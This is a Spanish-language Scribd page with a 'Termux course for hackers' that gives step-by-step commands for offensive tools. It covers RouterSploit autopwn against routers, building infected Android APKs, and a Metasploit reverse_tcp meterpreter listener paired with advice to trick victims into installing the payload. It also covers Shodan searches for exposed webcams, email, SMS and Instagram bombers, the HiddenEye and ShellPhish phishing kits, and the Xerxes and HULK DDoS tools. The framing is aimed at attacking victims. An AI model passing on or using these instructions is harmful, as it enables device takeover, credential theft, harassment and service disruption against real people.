100% encontró este documento útil (3 votos)
4K vistas15 páginas

Curso de Termux para Hackers

es un asistente que ayuda a identificar el dispositivo y las vulnerabilidades. scanners: es un escáner de puertos y servicios. clients: es un cliente para interactuar con los dispositivos. 1. git clone https://github.com/threat9/routersploit.git 2. cd routersploit 3. pip3 install -r requirements.txt 4. python3 rsf.py 5. use exploit/router/dlink/rce_2750u 6. set target 192.168.1.1 7. run 8. use auxiliary/scanner
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
100% encontró este documento útil (3 votos)
4K vistas15 páginas

Curso de Termux para Hackers

es un asistente que ayuda a identificar el dispositivo y las vulnerabilidades. scanners: es un escáner de puertos y servicios. clients: es un cliente para interactuar con los dispositivos. 1. git clone https://github.com/threat9/routersploit.git 2. cd routersploit 3. pip3 install -r requirements.txt 4. python3 rsf.py 5. use exploit/router/dlink/rce_2750u 6. set target 192.168.1.1 7. run 8. use auxiliary/scanner
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

CURSO DE TERMUX Ever Tovar

CURSO DE TERMUX

1
CURSO DE TERMUX Ever Tovar

Contenido

Una pequeña descripción de quien soy…………………………………………………………………………….

GUIA DE TERMUX ..................................................................................................................

Comandos Básicos: ...............................................................................................................

Instalar Python, Pyhton3 y pip3............................................................................................

Instalar cURL, php y wget .....................................................................................................

Algunas herramientas:...........................................................................................................

Mestasploit ............................................................................................................................

TOOL-X................................................................................................................................

FSociety ...............................................................................................................................

Lazymux..............................................................................................................................

RouterSploit:........................................................................................................................

IPGeolocation:.....................................................................................................................

Malicious:.............................................................................................................................

Devploit ................................................................................................................................

WepPwn3r...........................................................................................................................

Algunas herramientas usando metasploit:..........................................................................

Tmvenom……………………………………………………………………………………………………………………….

SHODAN: ..........................................................................................................................

Spammers de emails, SMS e instagram............................................................................

Email-bomber:...................................................................................................................

Spammer-Grab .................................................................................................................

Instaspam: .........................................................................................................................

Herramientas para phishing:...............................................................................................

Hidden Eye:.......................................................................................................................

ShellPhish:.........................................................................................................................

Herramienta para obtener información de tus amigos en Facebook:............................

OSIF: ..................................................................................................................................

Herramientas para ataques DDOS...................................................................................

Xerxes: ..............................................................................................................................

HULK:.................................................................................................................................

2
CURSO DE TERMUX Ever Tovar

Herramienta para sacar metadatos de imagines:............................................................

ExiF: ...................................................................................................................................

3
CURSO DE TERMUX Ever Tovar

Quien soy

Me llamo Ever Tovar soy un hack de sombrero gris con experiencia en el


tema caracterizándome por siempre llevar llevar a ustedes este mundo
con guias de mi autoría totalmente gratis usando herramientas que todo
hacker de sombrero negro usa para sus fines.
Si deseas colaborar puedes hacerle en el link que dejare de mi cuenta de
paypal de esta manera me motivarías a seguir trayendo contenido de
calidad ( si deseas apoyarme o donar aquí te dejo mi paypal link
[Link] )
Llevo esta guias gratis para usted sin hacerme responsable del mal uso
que les puedan dar cada quien es responsable de sus actos.

4
CURSO DE TERMUX Ever Tovar

Comandos Básicos:
Lo primero que debemos hacer dando yo por entendido que ya has descargado el emulador de
termux, y si en caso aun no sabes como descargarlo solo deberás ir a la play store y
descargarla como una aplicación cualquiera el paso a seguir seria darle permiso de
almacenamiento a Termux y eso lo hacemos con el siguiente comando en la terminal

Comando escribirlo sin los entre paréntesis ( termux-setup-storage )

Principalmente pasamos a actualiza la lista de paquetes disponibles. Estos comandos debemos


ejecutarlos inicialmente después de la instalación y lo ejecutamos continuamente cada cierto
periodo de tiempo esto para recibir actualizaciones

Comando ( apt update )

El siguiente comando q debemos seguir en la ejecución y la función principal de este es el de


actualiza paquetes obsoletos. Esto es para que Apt pueda conocer los paquetes más nuevos

Comando ( apt upgrade )

El siguiente comando es uno de los mas importantes ya q nos permitirá buscar entre los
paquetes disponibles.

Comando ( apt search <query> )

El siguiente comando es el mas importante de todos ya q este nos permitirá instalar el paquete
o herramienta la cual deseamos trabajar.

Comando ( apt install + el nombre del paquete )

El comando que veremos a continuación nos muestra información sobre un paquete.

Comando ( apt show +nombre del paquete )

El siguiente comando enumera todos los paquetes disponibles.

Comando ( apt list )

Este enumera todos los paquetes instalados.

Comando ( apt list --installed )

En ocaciones tenemos paquetes inútiles que ya no deseamos tener para eliminar un paquete
instalado usamos el siguiente comando.

Comando ( apt remove +el nombre del paquete )

Apt como administrador de paquetes usa un formato de paquete llamado dpkg.

Normalmente, el uso directo de dpkg no es necesario, pero los siguientes dos

comandos pueden ser útiles:

dpkg -L <package>

Lista de archivos instalados de un paquete.

dpkg --verify

5
CURSO DE TERMUX Ever Tovar

Verifique la integridad de los paquetes instalados.

Ver la página del manual apt (ejecutar apt install manpara instalar primero un

visor de páginas man) para más información.

El comando a continuación muestra lo que hay dentro de la carpeta.

Comando ( ls )

Para ir a Home usamos el siguiente comando.

Comando ( cd )

Para entrar a un archivo, carpeta, directorio usamos el siguiente comando.

Comando ( cd +el nombre del archivo)

Para salir de la terminal solo basta con escribir.

Comando ( exit )

Para anular o cancelar proceso hacemos lo siguiente.

( Boton de volumen abajo + letra de teclado C )

Instalar Python, Pyhton3 y pip3


No es obligatorio poner pkg en muchos casos solo con apt es suficiente
1. Pkg install python
2. Pkg install python3
3. Pkg install python-pip
4. Pkg install python3-pip

Instalar cURL, php y wget


En algunos casos pkg no funciona siendo ese caso solo usa apt
1. pkg install curl
2. pkg install php

3. pip3 install wget

Algunas herramientas:
Metasploit: fue diseñada para explotar las vulnerabilidades de los equipos y es sin duda el
programa más usado por los mejores hackers del mundo.

. apt upgrade

. apt install curl

. curl –LO

[Link]

[Link]

6
CURSO DE TERMUX Ever Tovar

. chmod 777 [Link]

. ./[Link]

. ls

. cd metasploit-framework

. Iniciar la consola : ./msfconsole

TOOL-X
TOOL-X es un Script para instalar fácilmente distintas herramientas:

1 apt update

2 apt install git

3 git clone [Link]

4 cd Tool-X

5 chmod +x [Link]

6 sh [Link] si no funciona ejecutar ./[Link]

7 Ejecutar desde consola Tool-X

FSociety
Un framework de prueba de penetración, tendrá todos los scripts que un hacker necesita.

1 git clone [Link]

2 cd fsociety

3 chmod +x [Link]

4 bash [Link] ó ./[Link]

5 python2 [Link]

Lazymux
Es una herramienta similar a fsociety

1 git clone [Link]

2 cd Lazymux

3 python2 [Link]

RouterSploit:
routerSploit, es un framework de seguridad open source muy similar a Metasploit con el cual
podremos auditar los dispositivos

(routers, webcam, NAS, etc) para comprobar si tienen vulnerabilidades conocidas.

El framework, posee los siguientes 5 módulos

7
CURSO DE TERMUX Ever Tovar

exploits: es el módulo que aprovechan las vulnerabilidades identificadas.

creds: este módulo es para probar credenciales en los servicios de red.

scanners: es el módulo que verifican si un objetivo es vulnerable a cualquier exploit.

payloads: es el módulo para generar cargas útiles en diversas arquitecturas.

generic: módulo que realizan ataques genéricos.

<INSTALACIÓN>

routerSploit, esta maravillosa herramienta requiere de los siguientes paquetes:

- future

- requests

- paramiko

- pysnmp

- pycrypto

1 instalamos pip en Python3.

2 apt install python3-pip

clonamos el repositorio a nuestra terminal.

3 git clone [Link]

Una vez clonado nos posicionamos en él.

4 cd routersploit

Instalamos los requisitos.

5 python3 -m pip install -r [Link]

6 python3 -m pip install -r [Link]

7 Ejecutamos RouterSploit

8 python3 [Link]

<USO>

Para el uso de RouterSploit, sólo debemos de conocer la IP del dispositivo a auditar, si no has
cambiado tus IPs, posiblemente la de tu router sea

[Link] o [Link]

Una vez lanzado RouterSploit, seleccionamos el módulo scanner con autopwn

(esto lanzara todos los exploit contra el objetivo)

9 use scanner/autopwn

Marcamos el target

8
CURSO DE TERMUX Ever Tovar

10 set target [IP-DISPOSITIVO]

Pasamos a lanzar el ataque

11 run

IPGeolocation:
Herramienta que geolocaliza a la victima mediante su direccion ip:

1 git clone [Link]

2 pip3 install -r [Link] –user

3 ./[Link] –h(para ver las opciones)

Malicious:
Malicious es una herramienta para crear apk o ejecutables infectados para Android, mac,
windows etc... es una buena herramienta.

Procedemos a actualizar la terminal con

1 apt update && apt upgrade -y

Si en caso dado no se cuenta con el git ni python los instalamos con

2 apt install git python2 -y

Una vez teniendo lo anterior continuamos a clonar el git

3 git clone [Link]

Una vez clonado la seleccionamos malicious con

4 cd Malicious

Y procedemos a dar permisos

5 chmod 777 [Link]

Listamos con

6 ls

E instalamos lo siguiente

7 pip2 install -r [Link]

8 pip2 install --upgrade pip

Pasamos a ejecutarlo con

9 python2 [Link]

Una vez echo todo aparecerá una lista de sistemas a cuales se pueden generar un apk
maliciosa,

9
CURSO DE TERMUX Ever Tovar

en este caso android

Y por ejemplo dendroid

35

Ya se nos generara el apk. Para moverlo a la memoria para poderlo compartir procedemos a
listar y luego seleccionar Android

ls

cd Android

Volvemos a listar

ls

mv [Link] /sdcard

Con esto ya lo pueden encontrar en su almacenamiento...

Devploit
Devploit es una multi herramienta que nos permitira hacer varias funciones como rastrear una
ip hasta extraer datos de pag web y dispositivos...

-git clone [Link]

-cd Devploit

-chmod +x install

- ./install

-python2 [Link]

WepPwn3r
Es la herramienta que sirve para escanear paginas web en busca de bugs y vulnerabilidades.
Para los que apenas van instalando termux colocan lo siguiente...

1 -apt update

2 -apt upgrade

3 -pkg install git

4 -pkg install python

Ahora pasamos a instalar la herramienta que nos interesa...

5 -git clone [Link]

6 -cd webpwn3r

7 -chmod +x [Link]

8 -python2 [Link]

10
CURSO DE TERMUX Ever Tovar

Herramientas usando metasploit:


Como hackear un Android desde termux o, desde linux (No estoy muy seguro que en Linux
funcione no lo eh probado)

<Requisito>

Tener Metasploit instalado en termux

Siempre recomiendo tener Es file Explorer

Procedimiento

1- apt update

2- apt upgrade

3- pkg install pip

4- pkg install git

5- pkg install python2 (Solo en caso de que no lo tengan instalado

6- pkg installl php

7- git clone [Link]

8- cd tmvenom

9- ls (listamos contenido de la carpeta)

10- chmod +x [Link]

11- sh [Link]

12- python2 [Link]

Asta este paso si hicieron todo bien siguiendo cada uno de mis pasos y tienen Mestasploit
instalado en su termux

Eso les dejar un menu con 11 opciones vamos a elegir la 1 para un payload en android

-El ataque que vamos a realizar va hacer dentro de LAN por lo cual vamos abrir otra terminal y
pondremos el comando

Comando ( ifconfig )

lo cual nos dara nuestra ip la ip la podrán encontrar hasta abajo de poner el comando donde
dice

inet add:"SU IP"

O simplemente van a la configuración de su celular, wifi, entrar a la red wifi a la que están
conectados y les aparece la ip

Luego vamos a copiar la ip mencionada y nos regresamos a la sesion 1 y la ponemos hay

-Después de ponerla nos pedirá un puerto, el script nos recomienda el 4444

Y generalmente es el que vamos a poner 4444

11
CURSO DE TERMUX Ever Tovar

Nos pedirá la ruta donde lo deseamos guardar la cual pondremos.

/sdcard/"Nombre que le quieran poner al payload ejemplo="

/sdcard/[Link]

El script procederá a generar el payload, el payload lo podemos encontrar en el


almacenamiento interno, por lo cual descargamos Es file Explorer Ahí nos va a decir si
queremos empezar a entrar el modo de escucha para eso pondremos una "y" lo cual nos
estará ejecutando Metasploit :)

Una vez inicie Metasploit pondremos los siguientes comandos

1 use multi/handler

2 set payload android/meterpreter/reverse_tcp

3 set lhost "la ip que pusieron anteriormente que sacaron con el comando ifconfig"

4 set lport 4444

5 exploit

Entrara en modo de escucha y de espera a que alguien ejecute la aplicación ustedes deben de
aplicar sus técnicas de ingeniería social para que la víctima caiga en mi caso lo are en mi propio
celular

Cuando la persona instale la app y el abra se ejecuta el payload y en la terminal de termux con
el comando "help" podremos ver todas las opciones que tenemos y con eso concluye ya
habremos hackeado un Android

SHODAN:
QUE ES SHODAN es un motor de búsqueda que es capaz de encontrar cualquier dispositivo
conectado a internet, Shodan trabaja principalmente con la deep web y es catalogado como el
buscador más aterrador del mundo puesto que encuentra dispositivos de cualquier tipo
siempre y cuando tengan conexión a internet, por ejemplo: semáforos, cámaras de seguridad,
computadoras, plantas de agua, redes eléctricas, etc.

¿CÓMO FUNCIONA SHODAN?:

Buscadores como Google indexan el contenido de la web, al menos aquellos que son de
carácter público, a través de los puertos 80 y 443 (HTTP y HTTPS), la peculiaridad de Shodan es
que rastrea todos los otros puertos existentes, permitiéndole encontrar cualquier dispositivo
que posea una IP, es decir, cualquiera que tenga conexión a internet.

<uso>

Trabaja con metasploit

La configuración:

1 Cd metasploit-framework

2 ./msfconsole

3 use auxiliary/gather/shodan_search

12
CURSO DE TERMUX Ever Tovar

4 show options

se crean una cuenta en shodan. Van a [Link] Clic para crear botón verde

Luego inicias cesión

Le damos click donde señala la flecha azul Les saldrá algo como este

- m02ZKlMk4qQTHUVooORM7Pf5Va7OI4oH copian Vamos a termux y terminamos de


configurar

Siguiente paso

5 -et SHODAN_APIKEY Y PEGAN LO QUE COPIARON

6 -et QUERY "webcamxp"

7 run

Nos saldra un listado de ip copiamos cualquier ip y lo pegamos en su navegador y nos muestra


la cámara

Spammers de emails, sms e instagram


Email-bomber:

1 git clone [Link]

2 cd Email-bomber

3 python2 [Link]

Nos pedira servidor del correo, Gmail o Yahoo

5 Nos pedirá el correo depende a lo que pusiste arriba, Colocan su correo correos temporales
son la mejor opción.

6 Colocan su contraseña para logearse (es seguro)

7 Colocan Email de la victima, el mensaje a enviar y la cantidad de correos a enviar

Spammer-Grab
1 git clone [Link]

2 cd Spammer-Grab

3 ./[Link]

4 python2 [Link] –h (h les muestra los comandos)

Ejemplo:

5 Python2 [Link] –delay 15(delay es el tiempo que se tomara en enviar los mensajes
puedes poner cualquier numero) (aca el numero de la victica con el código del pais)

6 Python2 [Link] –delay 10 1234513242

13
CURSO DE TERMUX Ever Tovar

Instaspam
Herramienta para spammear cuentas de Instagram

1 git clone [Link]

2 cd instaspam

3 chmod +x [Link]

4 bash [Link] ó ./[Link]

Herramientas para phishing:


Hidden Eye:

Scripts que contiene varias páginas clonadas para obtener credenciales:

1 apt install git python php curl openssh grep

2 pip3 install wget

3 git clone [Link]

4 cd HiddenEye

5 pip3 install -r [Link]

6 chmod 777 [Link]

7 python3 [Link]

ShellPhish:
Herramienta para hacer phishing y tambien saca direcciones ip e información extra

1 git clone [Link]

2 cd shellphish

3 bash [Link] ó ./[Link]

Herramienta para obtener información de nuestros amigos en facebook:

También existe una herramienta alterna a la de OSIF que hace exactamente lo mismo, solo
buscan en google fbi github

OSIF:

1 apt update upgrade

2 apt install git python2

3 git clone [Link]

4 cd OSIF

5 pip2 install -r [Link]

6 python2 [Link]

14
CURSO DE TERMUX Ever Tovar

7 coloca help para que les aparezca las opciones

8 Aca les pedirá loggearse con su cuenta de fb para crear un Tokken, háganlo normal no pasara
nada, si no les permite quizá sea porque en su Faceboox activaron la doble verificación,
desactívenla por un minuto para loggearse y listo luego no les volverá a pedir que se loggeen

Herramientas para ataques DDOS


Xerxes:

1 apt install git

1 apt install clang

3 git clone [Link]

4 cd xerxes

5 clang xerxes.c -o xerxes

6 ./xerxes website 80

HULK:

1 Git clone [Link]

2 Cd hulk

3 Python2 [Link] -site [Link] 2>/dev/null

Herramienta para sacar metadatos de imagines:


ExiF:

1 git clone [Link]

2 Cd Exif

3 Chmod +x [Link]

4 Sh [Link] ó bash [Link] ó ./[Link]

5 Se recomienda usar EsfileExplorer para obtener la direccion especifica de la imagen

No olvides apoyarnos en PayPal link [Link]

15

También podría gustarte